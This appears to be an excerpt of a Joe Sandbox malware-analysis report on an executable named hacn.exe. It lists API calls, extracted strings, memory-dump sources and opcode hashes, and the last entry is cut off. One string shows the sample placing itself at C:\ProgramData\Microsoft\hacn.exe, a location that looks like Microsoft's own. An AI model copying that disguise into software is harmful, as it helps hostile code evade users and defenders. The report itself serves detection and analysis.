                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _set_statfp
                                                                                          • String ID:
                                                                                          • API String ID: 1156100317-0
                                                                                          • Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                          • Instruction ID: 7d32a5bc9143e7536d27d3a1dc1be1301e8bb3d51177e842edf1fba4746b298e
                                                                                          • Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                          • Instruction Fuzzy Hash: 191142E6E5EA03C1F6643369E48E37530506FF5360F850634ED6E862EBDE2CA850854C
                                                                                          APIs
                                                                                          • FlsGetValue.KERNEL32(?,?,?,00007FF64778AC67,?,?,00000000,00007FF64778AF02,?,?,?,?,?,00007FF6477831CC), ref: 00007FF64778BA6F
                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF64778AC67,?,?,00000000,00007FF64778AF02,?,?,?,?,?,00007FF6477831CC), ref: 00007FF64778BA8E
                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF64778AC67,?,?,00000000,00007FF64778AF02,?,?,?,?,?,00007FF6477831CC), ref: 00007FF64778BAB6
                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF64778AC67,?,?,00000000,00007FF64778AF02,?,?,?,?,?,00007FF6477831CC), ref: 00007FF64778BAC7
                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF64778AC67,?,?,00000000,00007FF64778AF02,?,?,?,?,?,00007FF6477831CC), ref: 00007FF64778BAD8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value
                                                                                          • String ID:
                                                                                          • API String ID: 3702945584-0
                                                                                          • Opcode ID: 1e6e5a782a5f01b492f8cacbcb6a8fcb5416b77157f1d6b583dc0ddb18180ab8
                                                                                          • Instruction ID: 40207a1ebcffaab786599ddadadfd435edd70612a504d1d0e5fcd137c63f061a
                                                                                          • Opcode Fuzzy Hash: 1e6e5a782a5f01b492f8cacbcb6a8fcb5416b77157f1d6b583dc0ddb18180ab8
                                                                                          • Instruction Fuzzy Hash: 2B115E20F0C642C1FA59B336E95117A21516F447B0FD64735EC3DCA7E6DE6CF402820A
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value
                                                                                          • String ID:
                                                                                          • API String ID: 3702945584-0
                                                                                          • Opcode ID: e8ff1f6aa748b16705e4ba19835f5286931d9fc51bca771aec8a92ae03e77792
                                                                                          • Instruction ID: 958fcbfe30103cd870da0594eb9c4cdc6ac8086999b6346d39988a84e6cd121e
                                                                                          • Opcode Fuzzy Hash: e8ff1f6aa748b16705e4ba19835f5286931d9fc51bca771aec8a92ae03e77792
                                                                                          • Instruction Fuzzy Hash: 5B11C960F0D207C1FA687731D85267A11815F45774FDA5B74DD3ECA2F2ED6CB441824A
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID: verbose
                                                                                          • API String ID: 3215553584-579935070
                                                                                          • Opcode ID: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
                                                                                          • Instruction ID: d1906dbb5167c32503cdba7b4091ee7c4a741bb2887c2f6fd38d7088e1454faf
                                                                                          • Opcode Fuzzy Hash: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
                                                                                          • Instruction Fuzzy Hash: 2891DD22A0CA86D1F721BB25D49077D36A1AB00B98FC64936DE5EC73C6DE3CE8458349
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                          • API String ID: 3215553584-1196891531
                                                                                          • Opcode ID: 8562a2ddaa4935eebf24a1799f06cf0f98d553335d1454eb5137ecb29e0aa9bc
                                                                                          • Instruction ID: 6a4e61f393c9e14ad13fc2853a842f927a8f1b58f75e8d0aeccd77af360ec478
                                                                                          • Opcode Fuzzy Hash: 8562a2ddaa4935eebf24a1799f06cf0f98d553335d1454eb5137ecb29e0aa9bc
                                                                                          • Instruction Fuzzy Hash: 7481D0F6E2E603C5FB64BF29811467876A0EB20B48FD58834CE09D7295CF2DE841D789
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: CallEncodePointerTranslator
                                                                                          • String ID: MOC$RCC
                                                                                          • API String ID: 3544855599-2084237596
                                                                                          • Opcode ID: 93df84ad8f7e49cea4bf2fe45b974ce3ad7a793f20ece70ff6f590e0afe80a83
                                                                                          • Instruction ID: 7db4f11679b70e364da78d6e0e5d83e315af1188d37d683f53ce5598b9f033ff
                                                                                          • Opcode Fuzzy Hash: 93df84ad8f7e49cea4bf2fe45b974ce3ad7a793f20ece70ff6f590e0afe80a83
                                                                                          • Instruction Fuzzy Hash: 75616736A08A85CAE720FF65D1803AD77A0FB48B98F444626EE4D97B98CF78E055C704
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                          • String ID: csm$csm
                                                                                          • API String ID: 3896166516-3733052814
                                                                                          • Opcode ID: bb0dbae594e6361f888f3677e997f8fccf17b68f1c0f59f7e08c923b6417c7cb
                                                                                          • Instruction ID: ec5bc5d049d311bac2fd147244c12f9472ea931a08fbccdb8a9c9ad9a99d7ddb
                                                                                          • Opcode Fuzzy Hash: bb0dbae594e6361f888f3677e997f8fccf17b68f1c0f59f7e08c923b6417c7cb
                                                                                          • Instruction Fuzzy Hash: B7517D32A0C282C6EA64BF25964467877A0EB54B88F948135DE9CC7B95CF3CF5528B08
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$ByteCharMultiWide
                                                                                          • String ID: %s%s: %s$Fatal error detected
                                                                                          • API String ID: 1878133881-2410924014
                                                                                          • Opcode ID: 6a476509950944f0bc5995eed920a659af08b50e3adf8d3da3d7a8787779b220
                                                                                          • Instruction ID: 35595f53cfe33a3ca823e743ce29c68beedf20759f45af09ba0f8b43c53a74a4
                                                                                          • Opcode Fuzzy Hash: 6a476509950944f0bc5995eed920a659af08b50e3adf8d3da3d7a8787779b220
                                                                                          • Instruction Fuzzy Hash: 3931F07262C681D1E620FB10E4516EA6365FF94BC4FC04136EA8D96AA9DF3CE605CB44
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(?,00007FF6477739EA), ref: 00007FF647773F01
                                                                                            • Part of subcall function 00007FF6477729E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6477788F2,?,?,?,?,?,?,?,?,?,?,?,00007FF64777101D), ref: 00007FF647772A14
                                                                                            • Part of subcall function 00007FF6477729E0: MessageBoxW.USER32 ref: 00007FF647772AF0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFileLastMessageModuleName
                                                                                          • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                          • API String ID: 2581892565-1977442011
                                                                                          • Opcode ID: 4067cf041b03358d9120c4033d5e670654b83d2b71477f60263b0e522fc37818
                                                                                          • Instruction ID: 69cf025d5ea98c450e67e85df98fa3146e4295cb2a18208eea335ab7e385f7c5
                                                                                          • Opcode Fuzzy Hash: 4067cf041b03358d9120c4033d5e670654b83d2b71477f60263b0e522fc37818
                                                                                          • Instruction Fuzzy Hash: 2B011AA1B1E686D1FEA0B724E8567B91261EF58BC4FC00031ED4DC6696EE1CF1488608
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                          • String ID:
                                                                                          • API String ID: 2718003287-0
                                                                                          • Opcode ID: ac6203f977c47ba8bc2a8f0cb0d6a0086fe2a36fe5d42d2389b6d07504d3a7ef
                                                                                          • Instruction ID: 46f42f94cccdeb0775ef2726be8866e87a38792732a0406482b4e0217af0617c
                                                                                          • Opcode Fuzzy Hash: ac6203f977c47ba8bc2a8f0cb0d6a0086fe2a36fe5d42d2389b6d07504d3a7ef
                                                                                          • Instruction Fuzzy Hash: D0D1F172B1CA81C9E710EF69D4402AC3BB1FB49798B918236CE5DD7B99DE38D40AC314
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: LongWindow$DialogInvalidateRect
                                                                                          • String ID:
                                                                                          • API String ID: 1956198572-0
                                                                                          • Opcode ID: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
                                                                                          • Instruction ID: 710fe90d25957f0fae87ff551d93c03a5938c45e37f3e11f553f18cb3f2552bf
                                                                                          • Opcode Fuzzy Hash: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
                                                                                          • Instruction Fuzzy Hash: 7211A961E0C142C2FA54B769F64427912A1EF95B80FC48130EF6946B9DCD2CE4C14608
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                          • String ID:
                                                                                          • API String ID: 2933794660-0
                                                                                          • Opcode ID: b9418945c21ca9359366919164a8697e450450899f1773ca7228eb8eaa6a9b3b
                                                                                          • Instruction ID: b83afb8dfb4bf44af06fc590466f285fd0e5f11eb1980b8c9e7f3e925b64bd02
                                                                                          • Opcode Fuzzy Hash: b9418945c21ca9359366919164a8697e450450899f1773ca7228eb8eaa6a9b3b
                                                                                          • Instruction Fuzzy Hash: 80111C62B19B05C9FB00EB60E8552BD33A4FB59758F840E31DE6D867A4DF78D1988380
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                          • String ID: ?
                                                                                          • API String ID: 1286766494-1684325040
                                                                                          • Opcode ID: 191dfcedb039f449dd25ac85e341943daf2aec9882a813766c2fb2958beeaf54
                                                                                          • Instruction ID: 834e940a6cbd39e0fcab81201d1d70fb844fe994c4a75c5ff58c992f31fd6260
                                                                                          • Opcode Fuzzy Hash: 191dfcedb039f449dd25ac85e341943daf2aec9882a813766c2fb2958beeaf54
                                                                                          • Instruction Fuzzy Hash: 9B412762A0D292C2FB60BB65E4813795A60EBA07A4F944335EF5CC6AE9DE3CD451C704
                                                                                          APIs
                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6477896D6
                                                                                            • Part of subcall function 00007FF64778B00C: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF647793492,?,?,?,00007FF6477934CF,?,?,00000000,00007FF647793995,?,?,00000000,00007FF6477938C7), ref: 00007FF64778B022
                                                                                            • Part of subcall function 00007FF64778B00C: GetLastError.KERNEL32(?,?,?,00007FF647793492,?,?,?,00007FF6477934CF,?,?,00000000,00007FF647793995,?,?,00000000,00007FF6477938C7), ref: 00007FF64778B02C
                                                                                          • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF64777C0E5), ref: 00007FF6477896F4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: BoundaryDeleteDescriptorErrorFileLastModuleName_invalid_parameter_noinfo
                                                                                          • String ID: C:\ProgramData\Microsoft\hacn.exe
                                                                                          • API String ID: 3976345311-1917537409
                                                                                          • Opcode ID: 88945070a8cc5cba7bbb6804309b980ad8c397b15a896308c4a26de9748459e8
                                                                                          • Instruction ID: 44253ca130537d0c298f05cdab63037426ffbeb841be787972e228ada43ea589
                                                                                          • Opcode Fuzzy Hash: 88945070a8cc5cba7bbb6804309b980ad8c397b15a896308c4a26de9748459e8
                                                                                          • Instruction Fuzzy Hash: 86418E76A0CB12CAEB54FF25D4400BD27A4EF84798B964035EE4E83B96DE3DE481C708
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFileLastWrite
                                                                                          • String ID: U
                                                                                          • API String ID: 442123175-4171548499
                                                                                          • Opcode ID: 58f62ff0c7f7b6be9e4ecb54e809448fa16189ed2b231f8d6d1ca058d2495b08
                                                                                          • Instruction ID: cd40bbc8b8fbd1d182f1ea6d0689699a2f861ce31bef4e3878baeece9ec8876c
                                                                                          • Opcode Fuzzy Hash: 58f62ff0c7f7b6be9e4ecb54e809448fa16189ed2b231f8d6d1ca058d2495b08
                                                                                          • Instruction Fuzzy Hash: 0A41BF62B1DA81C6EB20EF25E4447AA67A0FB98794F854031EE4DC7B98EF3CE441C744
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$ByteCharMultiWide
                                                                                          • String ID: Error detected
                                                                                          • API String ID: 1878133881-3513342764
                                                                                          • Opcode ID: 6f9a1586ca547a3c2f77bf815536a5540435ab6ab19a441e761cc5e7daea12c4
                                                                                          • Instruction ID: 4b78a3b8c2733af5cbf7631ca0767ca0c64e6046b931f17a86e81d1ef7762ef5
                                                                                          • Opcode Fuzzy Hash: 6f9a1586ca547a3c2f77bf815536a5540435ab6ab19a441e761cc5e7daea12c4
                                                                                          • Instruction Fuzzy Hash: 6E21247262CA86D1E620FB10E4916EA6364FF94784FC05136DA4D87A69DF3CE215C744
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$ByteCharMultiWide
                                                                                          • String ID: Fatal error detected
                                                                                          • API String ID: 1878133881-4025702859
                                                                                          • Opcode ID: 851903317bfc7efaf1ad6cdea84b2df33a0253a3527f03e892242bbcad957f63
                                                                                          • Instruction ID: 58e794ad4ab1eae03e53ade312143698b074e9ed6c36aaf13e63c69f767eee30
                                                                                          • Opcode Fuzzy Hash: 851903317bfc7efaf1ad6cdea84b2df33a0253a3527f03e892242bbcad957f63
                                                                                          • Instruction Fuzzy Hash: 4921217262CA81D1EB20FB14E4516EA6364FF947C8FC05136EA8D87A69DF3CE215CB44
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFileHeaderRaise
                                                                                          • String ID: csm
                                                                                          • API String ID: 2573137834-1018135373
                                                                                          • Opcode ID: 5da07f41cc1f2f0249302dc9aa2704e59a17d1d76e31cb25285a30e0af08f503
                                                                                          • Instruction ID: 3f4489b8756f2e83939b4af1577190354cc78100fd293f1da6119e5dbbfd6ec7
